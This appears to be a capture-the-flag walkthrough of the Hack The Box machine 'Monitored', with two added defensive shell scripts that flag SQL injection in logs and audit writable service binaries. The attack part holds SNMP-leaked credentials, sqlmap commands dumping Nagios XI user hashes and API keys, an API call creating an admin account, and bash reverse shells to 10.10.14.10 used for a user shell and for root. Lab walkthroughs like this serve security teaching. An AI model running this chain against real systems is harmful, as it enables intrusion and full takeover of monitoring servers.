
Monitored

 
Ports: 22, 80, 389, 443, 5667. Hosts: monitored.htb, nagios.monitored.htb
Found on port 443 with gobuster:
https://nagios.monitored.htb/nagiosxi/terminal/
https://nagios.monitored.htb/nagiosxi/login.php
 
From the UDP scan:
 
sudo nmap -sU -sC -sV -T4 --min-rate=500 monitored.htb -p161,162
Found credentials via SNMP (in the nmap scan result for port 161):
svc:XjH7VCehowpR1xZB
The credentials are not valid for the login page found in the previous stage.
Let's see if there is any other login page.
 
Try [image] with the creds, then we get [image].
Googling for a known exploit leads to:
https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php
Get the auth token with curl (POST), then try sqlmap:
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ks https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch --dbs
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ks https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi --tables
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ks https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi -T xi_users --dump
Database: nagiosxi
Table: xi_users
[2 entries]
+---------+----------------------+---------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
| user_id | name | email | api_key | enabled | password | username | created_by | last_login | api_enabled | last_edited | created_time | last_attempt | backend_ticket | last_edited_by | login_attempts | last_password_change |
+---------+----------------------+---------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
| 1 | Nagios Administrator | admin@monitored.htb | IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL | 1 | $2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C | nagiosadmin | 0 | 1701931372 | 1 | 1701427555 | 0 | 0 | IoAaeXNLvtDkH5PaGqV2XZ3vMZJLMDR0 | 5 | 0 | 1701427555 |
| 2 | svc | svc@monitored.htb | 2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK | 0 | $2a$10$12edac88347093fcfd392Oun0w66aoRVCrKMPBydaUfgsgAOUHSbK | svc | 1 | 1699724476 | 1 | 1699728200 | 1699634403 | 1705298638 | 6oWBPbarHY4vejimmu3K8tpZBNrdHpDgdUEs5P2PFZYpXSuIdrRMYgk66A0cjNjq | 1 | 6 | 1699697433 |
+---------+----------------------+---------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
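From the defender's side, the sqlmap runs above show up in the web server access log as requests to banner_message-ajaxhelper.php whose id parameter is not a plain integer. The following is an added example, not part of the original write-up; it assumes combined-format access logs, the function names are hypothetical, and the sample log lines are constructed.

```shell
#!/bin/sh
# Added example (not from the original write-up): find requests to the banner
# helper whose "id" query parameter is not a plain integer.
# Only the query string is inspected; POST bodies are not in access logs.

# Reads combined-format access log lines from files given as arguments, or stdin.
# Prints "client<TAB>raw id value" per suspicious request.
flag_banner_sqli() {
    awk '
    {
        if (split($0, q, "\"") < 3) next      # q[2] = "METHOD URI PROTO"
        split(q[2], req, " ")
        uri = req[2]
        if (uri !~ /banner_message-ajaxhelper\.php\?/) next
        qs = uri
        sub(/^[^?]*\?/, "", qs)               # keep only the query string
        n = split(qs, kv, "&")
        for (i = 1; i <= n; i++) {
            if (kv[i] !~ /^id=/) continue
            v = substr(kv[i], 4)
            if (v !~ /^[0-9]+$/) printf "%s\t%s\n", $1, v
        }
    }' "$@"
}

# Constructed sample log lines (documentation IP ranges, placeholder tokens).
sample_log() {
    cat <<'EOF'
192.0.2.10 - - [15/Jan/2024:06:01:02 +0000] "GET /nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=PLACEHOLDER HTTP/1.1" 200 48 "-" "Mozilla/5.0"
198.51.100.23 - - [15/Jan/2024:06:03:41 +0000] "GET /nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3%20AND%201%3D1&token=PLACEHOLDER HTTP/1.1" 200 48 "-" "sqlmap/1.7"
192.0.2.10 - - [15/Jan/2024:06:04:00 +0000] "GET /nagiosxi/login.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
EOF
}

# With file arguments, scan those logs; otherwise run over the constructed sample.
if [ "$#" -gt 0 ]; then flag_banner_sqli "$@"; else sample_log | flag_banner_sqli; fi
```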
Add a new user using the admin's api_key IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL:
curl -k "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=ivan&password=123456&name=ivan&email=ivan@gmail.com&auth_level=admin"
We now have ivan:123456. On login, a password change is required; it is changed to 123123.
Add a check command here, set to a reverse shell, then apply the configuration:
bash -c 'bash -i >& /dev/tcp/10.10.14.10/6666 0>&1'
Go to Hosts to activate it.
This gives the user shell.
 
sudo -l
User nagios may run the following commands on localhost:
    (root) NOPASSWD: /etc/init.d/nagios start
    (root) NOPASSWD: /etc/init.d/nagios stop
    (root) NOPASSWD: /etc/init.d/nagios restart
    (root) NOPASSWD: /etc/init.d/nagios reload
    (root) NOPASSWD: /etc/init.d/nagios status
    (root) NOPASSWD: /etc/init.d/nagios checkconfig
    (root) NOPASSWD: /etc/init.d/npcd start
    (root) NOPASSWD: /etc/init.d/npcd stop
    (root) NOPASSWD: /etc/init.d/npcd restart
    (root) NOPASSWD: /etc/init.d/npcd reload
    (root) NOPASSWD: /etc/init.d/npcd status
    (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php *
    (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *
    (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/migrate/migrate.php *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/components/getprofile.sh
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/upgrade_to_latest.sh
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/change_timezone.sh
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/reset_config_perms.sh
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_ssl_config.sh *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/backup_xi.sh *
The shell is unstable, so we upload an SSH public key to get a more stable shell.
Generate a key pair:
ssh-keygen -t rsa -b 4096
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCatX96WZAHuhuaZ4Q9V1VvAVygN+HktXmEnX4gYcbjE8lWeYG4gszN4zLzZQY9pgtMBurbVh6d9a4kqJPIx/ASig2qij4T00b5IcjX4a6jDMF1NzNribsQoy8DGCYVSNMoFLzmu4MA3jhg17bwUoMey7eL6CkWyNbCiHIp+RCBXqxYB9m4G1XRTKSMxXn0IovMxhr5w/yywxTHdh0kmwLdqhyNGaFVWNnyT/YCV0nZ2vAzETAS7FkcFG3ZJ0CrI2NDOLqMqYg4Fu+2+fV2jo2BfTarO201GJ0VkDYjbiyXZImDj5N3uehDtQEbFb04n3xUFtqL3WOM1+N6d4+NR6JE8B9tcKRShgrAtpY2hnaZgRF2vHoKViiPEsdV/BtZFLUnHXFaulqiL+sGMeZoGMCsyAxWzrLqa2geaEsA468onLB9S/b2Y/I0crSxxZvhvPumdO2gYGBWZpEsoOoWCQSNxIr1SkhwtTa0MRb+iBVmT47VHF2dX7KsZy1kZVswgT3g1n/OnqhdwBgjaJLa7HXE2RgqayWJ1Rf/Oz+aB/vjlJLLgqkkCJjWIcyX9XZDGWPK7cPMe40ZYpIJdqwauHEUgz3DdZzX3qmKxwnmxBdhJvfdT4mjI0Fyzj+dGDRaMZuGRBgHj7hhIEYrjskQLCIKLkQmVymIkmF4MgaWB72Apw==" > ~/.ssh/authorized_keys
Then upload the public key:
mkdir ~/.ssh
vi ~/.ssh/authorized_keys
Then connect over SSH:
ssh -i ~/.ssh/id_rsa nagios@monitored.htb
Run linpeas.sh:
/etc/systemd/system/multi-user.target.wants/mariadb.service could be executing some relative path
/etc/systemd/system/multi-user.target.wants/nagios.service is calling this writable executable: /usr/local/nagios/bin/nagios
/etc/systemd/system/multi-user.target.wants/nagios.service is calling this writable executable: /usr/local/nagios/bin/nagios
/etc/systemd/system/multi-user.target.wants/nagios.service is calling this writable executable: /usr/local/nagios/bin/nagios
/etc/systemd/system/multi-user.target.wants/npcd.service is calling this writable executable: /usr/local/nagios/bin/npcd
/etc/systemd/system/npcd.service is calling this writable executable: /usr/local/nagios/bin/npcd
vi /usr/local/nagios/bin/npcd
sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
vi /usr/local/nagios/bin/npcd
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.10/4444 0>&1
sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd
This gives the root shell.
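The root cause of the last step is a root-started service whose binary is writable by the nagios account, combined with a sudo rule that lets that account restart the service. The following is an added example, not part of the original write-up, of an audit a defender can run to find such units; the function name and the TRUSTED_UID parameter are hypothetical, and it checks only the first word of each ExecStart line.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit systemd units for
# ExecStart binaries that a non-root account could overwrite.
# usage: audit_units UNIT_DIR [TRUSTED_UID]   (TRUSTED_UID defaults to 0 = root)
# Prints "unit<TAB>binary<TAB>reason" for every risky executable.
audit_units() {
    unit_dir=$1
    trusted_uid=${2:-0}
    for unit in "$unit_dir"/*.service; do
        [ -f "$unit" ] || continue
        while IFS= read -r line || [ -n "$line" ]; do
            case $line in
                ExecStart=*) cmd=${line#ExecStart=} ;;
                *) continue ;;
            esac
            # Drop systemd's special executable prefixes (-, @, +, !, :).
            while :; do
                case $cmd in
                    [-@+!:]*) cmd=${cmd#?} ;;
                    *) break ;;
                esac
            done
            bin=${cmd%% *}                      # first word = executable path
            [ -e "$bin" ] || continue
            # -L follows symlinks, -n prints numeric ids: "<perms> <links> <uid> ..."
            meta=$(ls -lLdn -- "$bin")
            perms=${meta%% *}
            uid=$(printf '%s\n' "$meta" | awk '{print $3}')
            reason=
            [ "$uid" = "$trusted_uid" ] || reason="owner uid $uid"
            case $perms in
                # 6th character = group write bit, 9th = other write bit
                ?????w*|????????w*) reason="${reason:+$reason, }group/other-writable" ;;
            esac
            [ -z "$reason" ] || printf '%s\t%s\t%s\n' "${unit##*/}" "$bin" "$reason"
        done < "$unit"
    done
    return 0
}

# Stand-alone use: sh audit_units.sh /etc/systemd/system/multi-user.target.wants
if [ "$#" -gt 0 ]; then audit_units "$@"; fi
```

Any unit it reports should have its binary owned by root with mode 755 or tighter, and sudo rules that start or restart that unit should be reviewed alongside it.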